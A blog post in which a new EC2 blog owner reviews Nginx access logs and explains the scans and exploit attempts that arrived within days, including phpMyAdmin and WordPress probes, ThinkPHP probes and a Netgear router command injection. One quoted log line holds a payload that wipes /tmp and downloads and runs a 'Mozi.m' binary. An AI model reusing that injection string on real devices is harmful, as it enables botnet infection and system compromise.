Suspicious attacks that came as soon as I launched a blog on EC2

Introduction

Overview

I launched an EC2 instance with an AWS personal account, put Nginx and CMS in it, and opened a blog. I got the domain name and linked it with the IP address, but I haven't posted the content yet, and I can't get access to Roku.

However, looking at the Nginx access log, I found that within a day or two of creating it, attacks were being attempted from all over the world. Here, I will summarize what kind of attacks were specifically made.

Server settings

The server is an instance of EC2 t2.medium. I put Nginx and MySQL as middleware, and as CMS, I put Ghost that runs on Node.js instead of Wordpress that runs on PHP, which I am not good at.

The SecurityGroup settings have ports 80 and 443 open.

internet_dos_attack.png

Details of the attack

The details of the attack are described below. Aggressive access with similar content came from multiple locations around the world.

Attack on DB

The following requests came from around Hamburg, Germany and northern Taiwan.

xxx.xxx.xxx.xxx - - [12/Jan/2020:08:49:03 +0000] "GET /mysql/admin/index.php?lang=en HTTP/1.1" 404 580 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36"
xxx.xxx.xxx.xxx - - [12/Jan/2020:08:49:05 +0000] "GET /mysql/dbadmin/index.php?lang=en HTTP/1.1" 404 580 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36"
xxx.xxx.xxx.xxx - - [12/Jan/2020:08:49:05 +0000] "GET /mysql/sqlmanager/index.php?lang=en HTTP/1.1" 404 580 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36"
xxx.xxx.xxx.xxx - - [12/Jan/2020:08:49:06 +0000] "GET /mysql/mysqlmanager/index.php?lang=en HTTP/1.1" 404 580 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36"
xxx.xxx.xxx.xxx - - [12/Jan/2020:08:49:07 +0000] "GET /phpmyadmin/index.php?lang=en HTTP/1.1" 404 580 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36"
xxx.xxx.xxx.xxx - - [12/Jan/2020:08:49:08 +0000] "GET /phpMyadmin/index.php?lang=en HTTP/1.1" 404 580 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36"
xxx.xxx.xxx.xxx - - [12/Jan/2020:08:49:08 +0000] "GET /phpMyAdmin/index.php?lang=en HTTP/1.1" 404 580 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36"
xxx.xxx.xxx.xxx - - [12/Jan/2020:08:49:09 +0000] "GET /phpmyAdmin/index.php?lang=en HTTP/1.1" 404 580 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36"
xxx.xxx.xxx.xxx - - [12/Jan/2020:08:49:11 +0000] "GET /phpmyadmin1/index.php?lang=en HTTP/1.1" 404 580 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36"
xxx.xxx.xxx.xxx - - [12/Jan/2020:08:49:13 +0000] "GET /phpmyadmin2/index.php?lang=en HTTP/1.1" 404 580 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36"
xxx.xxx.xxx.xxx - - [12/Jan/2020:08:49:14 +0000] "GET /phpmyadmin3/index.php?lang=en HTTP/1.1" 404 580 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36"
xxx.xxx.xxx.xxx - - [12/Jan/2020:08:49:16 +0000] "GET /phpmyadmin4/index.php?lang=en HTTP/1.1" 404 580 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36"
xxx.xxx.xxx.xxx - - [12/Jan/2020:08:49:17 +0000] "GET /2phpmyadmin/index.php?lang=en HTTP/1.1" 404 580 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36"
xxx.xxx.xxx.xxx - - [12/Jan/2020:08:49:17 +0000] "GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en HTTP/1.1" 404 580 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36"
xxx.xxx.xxx.xxx - - [12/Jan/2020:08:49:19 +0000] "GET /phpmy/index.php?lang=en HTTP/1.1" 404 580 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36"
xxx.xxx.xxx.xxx - - [12/Jan/2020:08:49:22 +0000] "GET /phppma/index.php?lang=en HTTP/1.1" 404 580 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36"
xxx.xxx.xxx.xxx - - [12/Jan/2020:08:49:22 +0000] "GET /myadmin/index.php?lang=en HTTP/1.1" 404 580 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36"
xxx.xxx.xxx.xxx - - [12/Jan/2020:08:49:23 +0000] "GET /shopdb/index.php?lang=en HTTP/1.1" 404 580 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36"
xxx.xxx.xxx.xxx - - [12/Jan/2020:08:49:25 +0000] "GET /MyAdmin/index.php?lang=en HTTP/1.1" 404 580 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36"
xxx.xxx.xxx.xxx - - [12/Jan/2020:08:49:25 +0000] "GET /program/index.php?lang=en HTTP/1.1" 404 580 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36"
xxx.xxx.xxx.xxx - - [12/Jan/2020:08:49:26 +0000] "GET /PMA/index.php?lang=en HTTP/1.1" 404 580 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36"

These requests seem to be looking for the location of PHPMyAdmin. If the attack was successful, the contents of the DB may have been extracted or tampered with.

Fortunately, I didn't include PHPMyAdmin in the first place, so I wasn't hurt by this attack, but if I did, I'd put it in a confusing place on the assumption that it would be exposed to such an attack. There seems to be a need.

Collecting Wordpress information

I received the following requests from a server on GCP in the United States and a server around London in the United Kingdom.

xxx.xxx.xxx.xxx - - [14/Jan/2020:12:55:04 +0000] "GET /wp-includes/wlwmanifest.xml HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36"
xxx.xxx.xxx.xxx - - [14/Jan/2020:12:55:05 +0000] "GET /xmlrpc.php?rsd HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36"
xxx.xxx.xxx.xxx - - [14/Jan/2020:12:55:05 +0000] "GET / HTTP/1.1" 200 22348 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36"
xxx.xxx.xxx.xxx - - [14/Jan/2020:12:55:06 +0000] "GET /blog/wp-includes/wlwmanifest.xml HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36"
xxx.xxx.xxx.xxx - - [14/Jan/2020:12:55:06 +0000] "GET /web/wp-includes/wlwmanifest.xml HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36"
xxx.xxx.xxx.xxx - - [14/Jan/2020:12:55:06 +0000] "GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36"
xxx.xxx.xxx.xxx - - [14/Jan/2020:12:55:06 +0000] "GET /website/wp-includes/wlwmanifest.xml HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36"
xxx.xxx.xxx.xxx - - [14/Jan/2020:12:55:06 +0000] "GET /wp/wp-includes/wlwmanifest.xml HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36"
xxx.xxx.xxx.xxx - - [14/Jan/2020:12:55:06 +0000] "GET /news/wp-includes/wlwmanifest.xml HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36"
xxx.xxx.xxx.xxx - - [14/Jan/2020:12:55:06 +0000] "GET /2018/wp-includes/wlwmanifest.xml HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36"
xxx.xxx.xxx.xxx - - [14/Jan/2020:12:55:07 +0000] "GET /2019/wp-includes/wlwmanifest.xml HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36"
xxx.xxx.xxx.xxx - - [14/Jan/2020:12:55:07 +0000] "GET /shop/wp-includes/wlwmanifest.xml HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36"
xxx.xxx.xxx.xxx - - [14/Jan/2020:12:55:07 +0000] "GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36"
xxx.xxx.xxx.xxx - - [14/Jan/2020:12:55:07 +0000] "GET /test/wp-includes/wlwmanifest.xml HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36"
xxx.xxx.xxx.xxx - - [14/Jan/2020:12:55:07 +0000] "GET /media/wp-includes/wlwmanifest.xml HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36"
xxx.xxx.xxx.xxx - - [14/Jan/2020:12:55:07 +0000] "GET /wp2/wp-includes/wlwmanifest.xml HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36"
xxx.xxx.xxx.xxx - - [14/Jan/2020:12:55:07 +0000] "GET /site/wp-includes/wlwmanifest.xml HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36"
xxx.xxx.xxx.xxx - - [14/Jan/2020:12:55:07 +0000] "GET /cms/wp-includes/wlwmanifest.xml HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36"
xxx.xxx.xxx.xxx - - [14/Jan/2020:12:55:08 +0000] "GET /sito/wp-includes/wlwmanifest.xml HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36"

It seems that he is desperately searching for the location of the file'** wlwmanifest.xml **'. This file is said to be the configuration file for a tool called Windows Live Writer. When I saw the contents of this file, [No direct damage](https://security.stackexchange.com/questions/189800/why-might-i-want-to-remove-the-wlwmanifest-xml -file-in-wordpress) That's right.

Aim at framework vulnerabilities

The following request came from a server running on Tencent Cloud in China.

xxx.xxx.xxx.xxx - - [13/Jan/2020:06:56:41 +0000] "GET /TP/public/index.php HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
xxx.xxx.xxx.xxx - - [13/Jan/2020:06:56:41 +0000] "GET /TP/public/index.php/ HTTP/1.1" 301 55 "http://yyy.yyy.yyy.yyy/TP/public/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
xxx.xxx.xxx.xxx - - [13/Jan/2020:06:56:41 +0000] "GET /tp/public/index.php/ HTTP/1.1" 404 2311 "http://yyy.yyy.yyy.yyy/TP/public/index.php/" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
xxx.xxx.xxx.xxx - - [13/Jan/2020:06:56:42 +0000] "GET /TP/index.php HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
xxx.xxx.xxx.xxx - - [13/Jan/2020:06:56:42 +0000] "GET /TP/index.php/ HTTP/1.1" 301 48 "http://yyy.yyy.yyy.yyy/TP/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
xxx.xxx.xxx.xxx - - [13/Jan/2020:06:56:42 +0000] "GET /tp/index.php/ HTTP/1.1" 404 2311 "http://yyy.yyy.yyy.yyy/TP/index.php/" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
xxx.xxx.xxx.xxx - - [13/Jan/2020:06:56:42 +0000] "GET /thinkphp/html/public/index.php HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
xxx.xxx.xxx.xxx - - [13/Jan/2020:06:56:42 +0000] "GET /thinkphp/html/public/index.php/ HTTP/1.1" 404 2311 "http://yyy.yyy.yyy.yyy/thinkphp/html/public/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
xxx.xxx.xxx.xxx - - [13/Jan/2020:06:56:42 +0000] "GET /html/public/index.php HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
xxx.xxx.xxx.xxx - - [13/Jan/2020:06:56:43 +0000] "GET /html/public/index.php/ HTTP/1.1" 404 2311 "http://yyy.yyy.yyy.yyy/html/public/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
xxx.xxx.xxx.xxx - - [13/Jan/2020:06:56:43 +0000] "GET /public/index.php HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
xxx.xxx.xxx.xxx - - [13/Jan/2020:06:56:43 +0000] "GET /public/index.php/ HTTP/1.1" 404 2311 "http://yyy.yyy.yyy.yyy/public/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
xxx.xxx.xxx.xxx - - [13/Jan/2020:06:56:43 +0000] "GET /TP/html/public/index.php HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
xxx.xxx.xxx.xxx - - [13/Jan/2020:06:56:43 +0000] "GET /TP/html/public/index.php/ HTTP/1.1" 301 60 "http://yyy.yyy.yyy.yyy/TP/html/public/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
xxx.xxx.xxx.xxx - - [13/Jan/2020:06:56:44 +0000] "GET /tp/html/public/index.php/ HTTP/1.1" 404 2311 "http://yyy.yyy.yyy.yyy/TP/html/public/index.php/" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
xxx.xxx.xxx.xxx - - [13/Jan/2020:06:56:44 +0000] "GET /elrekt.php HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
xxx.xxx.xxx.xxx - - [13/Jan/2020:06:56:46 +0000] "GET /elrekt.php/ HTTP/1.1" 404 2311 "http://yyy.yyy.yyy.yyy/elrekt.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
xxx.xxx.xxx.xxx - - [13/Jan/2020:06:56:46 +0000] "GET /index.php HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
xxx.xxx.xxx.xxx - - [13/Jan/2020:06:56:46 +0000] "GET /index.php/ HTTP/1.1" 404 2311 "http://yyy.yyy.yyy.yyy/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
xxx.xxx.xxx.xxx - - [13/Jan/2020:06:56:46 +0000] "GET / HTTP/1.1" 200 3451 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"

It seems that it is an attack targeting a vulnerability in a PHP framework called ThinkPHP, which is popular in China. This blog has a detailed description of the vulnerability. In a nutshell, it's a vulnerability that allows something like OS command injection.

Attacks targeting router vulnerabilities

An attack came while I was writing this article. I'm coming all the way from Hunan, China. The request was as below.

xxx.xxx.xxx.xxx - - [15/Jan/2020:03:47:25 +0000] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 178 "-" "-"

It seems that a vulnerability in Netgear's router allows OS command injection by passing parameters to a file called setup.cgi and executing it (Reference. / exploits / 24931)). ** rm -rf ** or some ugly commands are being passed. Fortunately I wasn't involved in this vulnerability, so it was intact.

Summary

There were many attacks that created vulnerabilities in tools. It seems that the tools and frameworks installed on the server need to be updated frequently.

Many of the attacks targeted Wordpress and PHP. As these have a high share, they may be more exposed to attacks.

Also, even if it was something like my website that had no content and was not accessed by anyone, the attack was coming. It made me realize that everyone should take appropriate measures without thinking that cyber attacks are other people's affairs.

Recommended Posts

Suspicious attacks that came as soon as I launched a blog on EC2
Points that I often get hooked on writing as a MySQL beginner
Like as soon as a reply comes on Twitter
A word that I was interested in as a programming beginner
I made a neural network generator that runs on FPGA
I tried to create a server environment that runs on Windows 10